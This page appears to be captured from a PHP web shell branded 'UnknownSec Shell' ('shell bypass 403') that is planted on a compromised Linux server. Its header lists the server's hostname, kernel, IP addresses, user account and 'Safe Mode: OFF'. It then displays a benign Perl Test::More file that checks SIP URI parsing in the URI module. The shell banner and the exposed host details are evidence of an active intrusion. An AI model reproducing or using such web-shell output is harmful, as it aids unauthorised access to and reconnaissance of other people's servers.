shell bypass 403

UnknownSec Shell

: /home/.cpan/build/URI-5.34-0/t/ [ drwxrwxr-x ]
Uname: Linux dedi-15171674.espacofacial.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
Software: Apache
PHP version: 8.2.33 [ PHP INFO ] PHP os: Linux
Server Ip: 172.67.154.186
Your Ip: 216.73.217.141
User: espa7358 (1004) | Group: espa7358 (1003)
Safe Mode: OFF
Disable Function:
NONE

name : sip.t
use strict;
use warnings;

use Test::More tests => 13;

use URI ();

my $u = URI->new('sip:[email protected]');
ok($u->user eq 'phone' &&
   $u->host eq 'domain.ext' &&
   $u->port eq '5060' &&
   $u->host_port eq 'domain.ext:5060' &&
   $u->authority eq '[email protected]' &&
   $u eq 'sip:[email protected]');

$u->host_port('otherdomain.int:9999');
ok($u->host eq 'otherdomain.int' &&
   $u->port eq '9999' &&
   $u->host_port eq 'otherdomain.int:9999' &&
   $u->authority eq '[email protected]:9999' &&
   $u eq 'sip:[email protected]:9999');

$u->port('5060');
$u = $u->canonical;
ok($u->port eq '5060' &&
   $u->host_port eq 'otherdomain.int:5060' &&
   $u->authority eq '[email protected]' &&
   $u eq 'sip:[email protected]');

$u->user('voicemail');
ok($u->user eq 'voicemail' &&
   $u->authority eq '[email protected]' &&
   $u eq 'sip:[email protected]');

$u->authority('[email protected]');
ok($u->user eq 'fax' &&
   $u->host eq 'gateway.ext' &&
   $u->host_port eq 'gateway.ext:5060' &&
   $u->authority eq '[email protected]' &&
   $u eq 'sip:[email protected]');

$u = URI->new('sip:[email protected]?Subject=Meeting&Priority=Urgent');
ok($u->query eq 'Subject=Meeting&Priority=Urgent');

$u->query_form(Subject => 'Lunch', Priority => 'Low');
my @q = $u->query_form;
ok($u->query eq 'Subject=Lunch&Priority=Low' &&
   @q == 4 && "@q" eq 'Subject Lunch Priority Low' &&
   $u eq 'sip:[email protected]?Subject=Lunch&Priority=Low');

$u = URI->new('sip:[email protected];maddr=127.0.0.1;ttl=16');
ok($u->params eq 'maddr=127.0.0.1;ttl=16');

$u->params('maddr=127.0.0.1;ttl=16;x-addedparam=1');
ok($u->params eq 'maddr=127.0.0.1;ttl=16;x-addedparam=1' && 
   $u eq 'sip:[email protected];maddr=127.0.0.1;ttl=16;x-addedparam=1');

$u = URI->new('sip:[email protected]?Subject=Meeting&Priority=Urgent');
$u->params_form(maddr => '127.0.0.1', ttl => '16');
my @p = $u->params_form;
ok($u->query eq 'Subject=Meeting&Priority=Urgent' &&
   $u->params eq 'maddr=127.0.0.1;ttl=16' &&
   @p == 4 && "@p" eq "maddr 127.0.0.1 ttl 16");

$u = URI->new_abs('sip:[email protected]', 'sip:[email protected]');
is($u, 'sip:[email protected]');

$u = URI->new('sip:[email protected]');
is($u, $u->abs('http://www.cpan.org/'));

is($u, $u->rel('http://www.cpan.org/'));
© 2026 UnknownSec